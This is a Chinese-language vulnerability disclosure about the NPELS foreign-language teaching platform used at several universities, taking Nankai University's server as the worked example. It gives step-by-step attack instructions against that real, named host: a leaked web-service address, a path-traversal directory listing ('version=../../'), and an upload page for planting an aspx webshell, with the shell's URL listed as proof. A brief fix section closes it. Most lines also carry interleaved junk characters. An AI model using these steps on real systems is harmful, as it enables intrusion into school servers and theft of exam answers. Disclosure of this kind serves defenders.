好多大学都在用这个教学平台,这个漏洞会导致直接拿到试题答案,甚至作为跳板继续渗透进入学校其他服务器中
( h5 l- Y# M# L1 `" ?! S) t8 }! A _3 k
详细说明:5 Y0 d4 v) l8 c# l( `
. P3 P- l7 i; y" l- E/ |. ?
以南开大学的为例: 9 n8 @$ L* S! Z1 q7 s
http://222.30.60.3/NPELS
9 o4 t9 y& Z. P* r0 c6 _NPELS_LearningCenter_5.0 客户端下的 Update.exe.config 文件泄露一个重要地址
4 M) K: b* q) L1 O- }<setting name="Update_CommonSvr_CommonService" serializeAs="String">( o/ G5 z$ ^5 t: I; R4 H0 }( T) |
<value>http://222.30.60.3/NPELS/CommonService.asmx</value>
# ?- Q0 U# t* ^' S- v [8 L</setting>+ p: w I+ @7 r7 X0 i u
及版本号
! |$ ~) I7 K3 y<add key="TVersion" value="1, 0, 0, 2187">
/ S& Q& Z1 X' x6 E9 }</add>
# o( U! T! D' ]5 }- q直接访问( k. B- X1 R( b2 m0 j; b5 C
http://222.30.60.3/NPELS/CommonService.asmx
6 Z8 y$ G9 K$ H7 {使用GetTestClientFileList操作,直接 HTTP GET 列目录:
% t& H7 g2 }3 M* @* ^" C0 dhttp://222.30.60.3/NPELS/CommonS ... tFileList?version=1, 0, 0, 2187
, y7 d4 @ J+ G$ P1 k6 G1 g进一步列目录(返回的网页很大,可以直接 wget 下来)
' x% U4 G% m7 i) t4 n( }" Fhttp://222.30.60.3/NPELS/CommonS ... List?version=../../
/ p$ [. V" w. Y8 x6 V
% c$ q. L) u0 H发现
$ U8 E3 Q/ a$ Chttp://zzxx.nankai.edu.cn/npelsv/editor/editor.htm
8 R9 v: w! e0 d% H2 }& K可以上传,直接上传aspx木马即可,不需要改后缀名或者文件头
/ y& \0 F `8 o% L/ }1 W. \& j上传后继续列目录找到木马地址直接访问即可+ I9 c2 _! N$ l2 C% b7 N1 o
% N0 r! F4 L6 gOOXX L6 ^( g3 H6 T
7 |* ^7 n2 G9 O7 e; d! v9 lGoogle "新理念外语网络教学平台" 测试了几个其他的站,都有类似的列目录上传方法9 \! L/ y' `$ ^7 w; K9 f0 c
漏洞证明:
; b+ l6 M' P2 @ 9 B" Z- a7 a3 d" _& _' [8 ^* T
列目录:% U7 }7 Z) u$ V8 I, Z4 D3 F
http://222.30.60.3/NPELS/CommonS ... List?version=../../
: ^! P2 ^, D$ r6 s7 L$ e3 Z文件上传:
1 K. @: K- R- d+ c+ n2 g! @http://222.30.60.3/npelsv/editor/editor.htm
& j( z0 d9 O5 h; h z/ } $ y. t0 W3 ?7 h1 C; r
上传木马:
* @- H/ C; d. S3 [' w ehttp://222.30.60.3/npelsv/editor/uploadfiles/1.aspx
5 c$ o6 c/ j' f/ C
0 T# U9 o. R! ^修复方案:7 }: O9 f+ j+ W/ r4 o
好像考试系统必须使用 CommonService.asmx
4 L, ?! Y' b4 w% {2 b% T) f. i最好配置文件加密或者用别的方式不让它泄露出来
& d, L5 j5 ~' b并且检查或删除各上传入口,像 http://222.30.60.3/NPELS/Upload.aspx 一样
& [$ o5 d z/ G7 o- d' {& m7 F |